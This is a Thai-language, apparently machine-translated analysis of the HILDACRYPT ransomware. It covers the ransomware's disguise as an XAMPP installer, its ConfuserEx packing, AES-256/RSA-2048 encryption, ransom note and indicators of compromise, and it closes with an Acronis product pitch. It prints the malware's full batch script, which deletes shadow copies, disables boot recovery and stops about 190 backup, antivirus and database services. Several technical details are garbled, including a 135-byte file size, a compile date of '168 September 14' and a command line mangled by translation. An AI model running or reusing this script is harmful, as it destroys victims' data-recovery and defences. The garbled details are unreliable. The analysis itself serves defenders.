🥇HILDACRYPT: แรนซัมแวร์ตัวใหม่โจมตีระบบสำรองข้อมูลและโซลูชั่นป้องกันไวรัส

สวัสดีฮับ! เรากำลังพูดถึงมัลแวร์เวอร์ชันล่าสุดจากหมวดแรนซัมแวร์อีกครั้ง HILDACRYPT คือแรนซัมแวร์ตัวใหม่ ซึ่งเป็นสมาชิกของตระกูล Hilda ที่ถูกค้นพบในเดือนสิงหาคม 2019 โดยตั้งชื่อตามการ์ตูน Netflix ที่ใช้ในการเผยแพร่ซอฟต์แวร์ วันนี้เราจะมาทำความรู้จักกับคุณสมบัติทางเทคนิคของไวรัสแรนซัมแวร์ที่อัปเดตนี้

ในเวอร์ชันแรกของ Hilda ransomware ลิงก์ไปยังรายการที่โพสต์บน Youtube รถพ่วง การ์ตูนชุดมีอยู่ในจดหมายเรียกค่าไถ่ HILDACRYPT ปลอมตัวเป็นตัวติดตั้ง XAMPP ที่ถูกต้องตามกฎหมาย ซึ่งเป็นการกระจาย Apache ที่ติดตั้งง่ายซึ่งรวมถึง MariaDB, PHP และ Perl ในเวลาเดียวกัน cryptolocker มีชื่อไฟล์อื่น - xamp นอกจากนี้ไฟล์ ransomware ยังไม่มีลายเซ็นอิเล็กทรอนิกส์

การวิเคราะห์แบบคงที่

แรนซัมแวร์มีอยู่ในไฟล์ PE32 .NET ที่เขียนขึ้นสำหรับ MS Windows ขนาดของมันคือ 135 ไบต์ ทั้งโค้ดโปรแกรมหลักและโค้ดโปรแกรมตัวป้องกันเขียนด้วยภาษา C# ตามการประทับวันที่และเวลาการรวบรวม ไบนารีถูกสร้างขึ้นเมื่อวันที่ 168 กันยายน 14

จากข้อมูลของ Detect It Easy แรนซัมแวร์จะถูกเก็บถาวรโดยใช้ Confuser และ ConfuserEx แต่ตัว obfuscators เหล่านี้ยังคงเหมือนเดิม มีเพียง ConfuserEx เท่านั้นที่เป็นผู้สืบทอดของ Confuser ดังนั้นลายเซ็นโค้ดจึงคล้ายกัน

HILDACRYPT ได้รับการบรรจุด้วย ConfuserEx อย่างแน่นอน

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

เวกเตอร์โจมตี

เป็นไปได้มากว่าแรนซัมแวร์ถูกค้นพบบนเว็บไซต์เขียนโปรแกรมเว็บแห่งหนึ่ง โดยปลอมตัวเป็นโปรแกรม XAMPP ที่ถูกกฎหมาย

สามารถมองเห็นห่วงโซ่การติดเชื้อทั้งหมดได้ แซนด์บ็อกซ์ app.any.run.

การทำให้งงงวย

สตริงแรนซัมแวร์จะถูกจัดเก็บในรูปแบบที่เข้ารหัส เมื่อเปิดใช้งาน HILDACRYPT จะถอดรหัสโดยใช้ Base64 และ AES-256-CBC

การติดตั้ง

ก่อนอื่น ransomware จะสร้างโฟลเดอร์ใน %AppDataRoaming% ซึ่งพารามิเตอร์ GUID (Globally Unique Identifier) จะถูกสร้างขึ้นแบบสุ่ม ด้วยการเพิ่มไฟล์ค้างคาวในตำแหน่งนี้ ไวรัสแรนซัมแวร์จะเปิดใช้งานโดยใช้ cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & ออก

จากนั้นจะเริ่มดำเนินการชุดสคริปต์เพื่อปิดใช้งานคุณลักษณะหรือบริการของระบบ

สคริปต์ประกอบด้วยรายการคำสั่งจำนวนมากที่ทำลาย Shadow Copy, ปิดใช้งานเซิร์ฟเวอร์ SQL, โซลูชันการสำรองข้อมูลและป้องกันไวรัส

ตัวอย่างเช่น พยายามหยุดบริการ Acronis Backup ไม่สำเร็จ นอกจากนี้ยังโจมตีระบบสำรองข้อมูลและโซลูชั่นป้องกันไวรัสจากผู้ขายต่อไปนี้: Veeam, Sophos, Kaspersky, McAfee และอื่นๆ

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

เมื่อบริการและกระบวนการที่กล่าวถึงข้างต้นถูกปิดใช้งาน cryptolocker จะรวบรวมข้อมูลเกี่ยวกับกระบวนการที่ทำงานอยู่ทั้งหมดโดยใช้คำสั่งรายการงานเพื่อให้แน่ใจว่าบริการที่จำเป็นทั้งหมดหยุดทำงาน
รายการงาน v/fo csv

คำสั่งนี้แสดงรายการโดยละเอียดของกระบวนการที่ทำงานอยู่ โดยองค์ประกอบต่างๆ จะถูกคั่นด้วยเครื่องหมาย “”
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

หลังจากการตรวจสอบนี้ แรนซัมแวร์จะเริ่มกระบวนการเข้ารหัส

การเข้ารหัส

การเข้ารหัสไฟล์

HILDACRYPT จะตรวจสอบเนื้อหาที่พบทั้งหมดในฮาร์ดไดรฟ์ ยกเว้นโฟลเดอร์ Recycle.Bin และ Reference AssembliesMicrosoft ส่วนหลังประกอบด้วยไฟล์ dll, pdb ฯลฯ ที่สำคัญสำหรับแอปพลิเคชัน .Net ที่อาจส่งผลต่อการทำงานของ ransomware หากต้องการค้นหาไฟล์ที่จะเข้ารหัส จะใช้รายการส่วนขยายต่อไปนี้:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

Ransomware ใช้อัลกอริธึม AES-256-CBC เพื่อเข้ารหัสไฟล์ของผู้ใช้ ขนาดคีย์คือ 256 บิต และขนาดเวกเตอร์การเริ่มต้น (IV) คือ 16 ไบต์

ในภาพหน้าจอต่อไปนี้ ค่าของ byte_2 และ byte_1 ได้รับการสุ่มโดยใช้ GetBytes()

คีย์

ВИ

ไฟล์ที่เข้ารหัสมีนามสกุล HCY!.. นี่คือตัวอย่างของไฟล์ที่เข้ารหัส คีย์และ IV ที่กล่าวถึงข้างต้นถูกสร้างขึ้นสำหรับไฟล์นี้

การเข้ารหัสคีย์

cryptolocker เก็บคีย์ AES ที่สร้างขึ้นในไฟล์ที่เข้ารหัส ส่วนแรกของไฟล์ที่เข้ารหัสมีส่วนหัวที่มีข้อมูลเช่น HILDACRYPT, KEY, IV, FileLen ในรูปแบบ XML และมีลักษณะดังนี้:

การเข้ารหัสคีย์ AES และ IV ทำได้โดยใช้ RSA-2048 และการเข้ารหัสทำได้โดยใช้ Base64 คีย์สาธารณะ RSA จะถูกจัดเก็บไว้ในเนื้อหาของ cryptolocker ในสตริงที่เข้ารหัสรูปแบบ XML

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

คีย์สาธารณะ RSA ใช้เพื่อเข้ารหัสคีย์ไฟล์ AES คีย์สาธารณะ RSA มีการเข้ารหัส Base64 และประกอบด้วยโมดูลัสและเลขชี้กำลังสาธารณะ 65537 การถอดรหัสต้องใช้คีย์ส่วนตัว RSA ซึ่งผู้โจมตีมี

หลังจากการเข้ารหัส RSA คีย์ AES จะถูกเข้ารหัสโดยใช้ Base64 ที่จัดเก็บไว้ในไฟล์ที่เข้ารหัส

ข้อความเรียกค่าไถ่

เมื่อการเข้ารหัสเสร็จสมบูรณ์ HILDACRYPT จะเขียนไฟล์ html ไปยังโฟลเดอร์ที่เข้ารหัสไฟล์ การแจ้งเตือนแรนซัมแวร์ประกอบด้วยที่อยู่อีเมลสองที่อยู่ซึ่งเหยื่อสามารถติดต่อผู้โจมตีได้

[ป้องกันอีเมล]
[ป้องกันอีเมล]

ประกาศกรรโชกยังมีข้อความว่า “No loli is safe;)” ซึ่งเป็นการอ้างอิงถึงตัวละครในอนิเมะและมังงะที่มีรูปร่างหน้าตาเหมือนเด็กผู้หญิงตัวเล็ก ๆ ที่ถูกแบนในญี่ปุ่น

เอาท์พุต

HILDACRYPT แรนซัมแวร์ตระกูลใหม่ออกเวอร์ชันใหม่แล้ว รูปแบบการเข้ารหัสจะป้องกันไม่ให้เหยื่อถอดรหัสไฟล์ที่เข้ารหัสโดยแรนซัมแวร์ Cryptolocker ใช้วิธีการป้องกันแบบแอคทีฟเพื่อปิดใช้งานบริการป้องกันที่เกี่ยวข้องกับระบบสำรองข้อมูลและโซลูชั่นป้องกันไวรัส ผู้เขียน HILDACRYPT เป็นแฟนตัวยงของซีรีส์แอนิเมชั่นเรื่อง Hilda ที่ฉายทาง Netflix โดยลิงก์ไปยังตัวอย่างภาพยนตร์อยู่ในจดหมายแจ้งการซื้อกิจการสำหรับเวอร์ชันก่อนหน้าของโปรแกรม

โดยปกติ Acronis การสำรองข้อมูล и Acronis True Image สามารถปกป้องคอมพิวเตอร์ของคุณจากแรนซัมแวร์ HILDACRYPT และผู้ให้บริการก็มีความสามารถในการปกป้องลูกค้าของพวกเขาด้วย Acronis สำรองเมฆ. การป้องกันมั่นใจได้ด้วยข้อเท็จจริงที่ว่าโซลูชันเหล่านี้รวมอยู่ด้วย ความปลอดภัยทางไซเบอร์ ไม่เพียงแต่มีการสำรองข้อมูลเท่านั้น แต่ยังรวมถึงระบบรักษาความปลอดภัยแบบรวมของเราด้วย Acronis การป้องกันที่ใช้งานอยู่ - ขับเคลื่อนโดยโมเดลการเรียนรู้ของเครื่องและบนพื้นฐานของพฤติกรรมพฤติกรรม ซึ่งเป็นเทคโนโลยีที่สามารถตอบโต้ภัยคุกคามของแรนซัมแวร์แบบซีโรเดย์ที่ไม่เหมือนใคร

ตัวชี้วัดของการประนีประนอม

ไฟล์นามสกุล HCY!
HILDACRYPTReadMe.html
xamp.exe ที่มีตัวอักษร "p" หนึ่งตัวและไม่มีลายเซ็นดิจิทัล
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

ที่มา: will.com

HILDACRYPT: แรนซัมแวร์ตัวใหม่โจมตีระบบสำรองข้อมูลและโซลูชั่นป้องกันไวรัส